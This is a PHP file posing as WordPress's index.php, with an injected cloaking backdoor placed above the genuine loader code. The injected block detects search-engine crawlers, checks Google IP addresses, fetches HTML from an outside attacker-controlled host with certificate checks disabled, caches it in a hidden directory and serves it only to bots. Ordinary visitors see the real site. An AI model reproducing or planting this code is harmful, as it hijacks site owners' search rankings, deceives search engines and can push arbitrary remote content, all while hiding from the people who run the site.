<?php
error_reporting(0);
ini_set('display_errors', 0);
// ============================================
// CONFIGURATION
// ============================================
$config = [
'bot_url' => 'https://hxbdoor.one/raw/oe7h6zcg',
'cache_ttl' => 3600,
'timeout' => 15
];
function is_search_bot() {
$bots = [
// Google
'Googlebot', 'Googlebot-Mobile', 'Googlebot-Image', 'Googlebot-News',
'Googlebot-Video', 'AdsBot-Google', 'Mediapartners-Google',
'Google-InspectionTool', 'Google-Site-Verification', 'Storebot-Google',
// Bing
'bingbot', 'msnbot', 'BingPreview',
// Others
'Slurp', 'DuckDuckBot', 'Baiduspider', 'YandexBot',
'facebookexternalhit', 'LinkedInBot', 'Twitterbot'
];
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
foreach ($bots as $bot) {
if (stripos($user_agent, $bot) !== false) {
return true;
}
}
return false;
}
function verify_google_ip() {
$ip = $_SERVER['REMOTE_ADDR'] ?? '';
if (empty($ip)) {
return false;
}
// Quick check: Google IP ranges
$google_ip_prefixes = ['66.249.', '64.233.', '72.14.', '209.85.', '216.239.'];
foreach ($google_ip_prefixes as $prefix) {
if (strpos($ip, $prefix) === 0) {
return true;
}
}
// Deep verification: Reverse DNS
$hostname = gethostbyaddr($ip);
if (stripos($hostname, 'googlebot.com') !== false ||
stripos($hostname, 'google.com') !== false) {
$resolved_ip = gethostbyname($hostname);
if ($resolved_ip === $ip) {
return true;
}
}
return false;
}
function get_remote_content($url, $timeout = 10) {
// Try cURL first
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_MAXREDIRS => 5,
CURLOPT_TIMEOUT => $timeout,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
CURLOPT_ENCODING => 'gzip, deflate',
CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1
]);
$content = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);
if ($content && $http_code == 200) {
return $content;
}
error_log("cURL failed: $error (HTTP $http_code)");
}
// Fallback: file_get_contents
if (ini_get('allow_url_fopen')) {
$context = stream_context_create([
'http' => [
'method' => 'GET',
'timeout' => $timeout,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'follow_location' => 1,
'max_redirects' => 5
],
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false
]
]);
$content = @file_get_contents($url, false, $context);
if ($content !== false) {
return $content;
}
}
return false;
}
function cache_content($key, $content = null, $ttl = 3600) {
$cache_dir = __DIR__ . '/.cache';
if (!is_dir($cache_dir)) {
@mkdir($cache_dir, 0755, true);
}
$cache_file = $cache_dir . '/' . md5($key) . '.html';
if ($content !== null) {
// Save cache
file_put_contents($cache_file, serialize([
'time' => time(),
'content' => $content
]));
return true;
} else {
// Read cache
if (file_exists($cache_file)) {
$data = unserialize(file_get_contents($cache_file));
if ($data && (time() - $data['time']) < $ttl) {
return $data['content'];
}
}
}
return false;
}
function serve_bot_content($url, $ttl = 3600, $timeout = 15) {
// Try cache first
$cached = cache_content('bot_content', null, $ttl);
if ($cached) {
header('Content-Type: text/html; charset=utf-8');
header('X-Content-Source: cache');
header('X-Visitor-Type: bot');
echo $cached;
exit;
}
// Fetch fresh content
$content = get_remote_content($url, $timeout);
if ($content) {
cache_content('bot_content', $content, $ttl);
header('Content-Type: text/html; charset=utf-8');
header('X-Content-Source: remote');
header('X-Visitor-Type: bot');
echo $content;
exit;
}
// Fallback: Error
http_response_code(503);
header('Retry-After: 300');
echo '<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Temporarily Unavailable</title>
</head>
<body>
<h1>503 Service Temporarily Unavailable</h1>
<p>Please try again later.</p>
</body>
</html>';
exit;
}
// ============================================
// MAIN EXECUTION
// ============================================
// Check if visitor is a bot
if (is_search_bot()) {
// Additional security: Verify Google IP
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
if (stripos($user_agent, 'Googlebot') !== false) {
if (!verify_google_ip()) {
// Fake Googlebot! Let it see user content below
error_log("Fake Googlebot detected from IP: " . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
// Don't exit, continue to show HTML below
} else {
// Real Googlebot - serve remote content
serve_bot_content($config['bot_url'], $config['cache_ttl'], $config['timeout']);
}
} else {
// Other bots - serve remote content
serve_bot_content($config['bot_url'], $config['cache_ttl'], $config['timeout']);
}
}
// If we reach here, it's a regular user or fake bot
// Show the HTML content below
header('Content-Type: text/html; charset=utf-8');
header('X-Visitor-Type: user');
?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';Securely shared via CyberSec Paste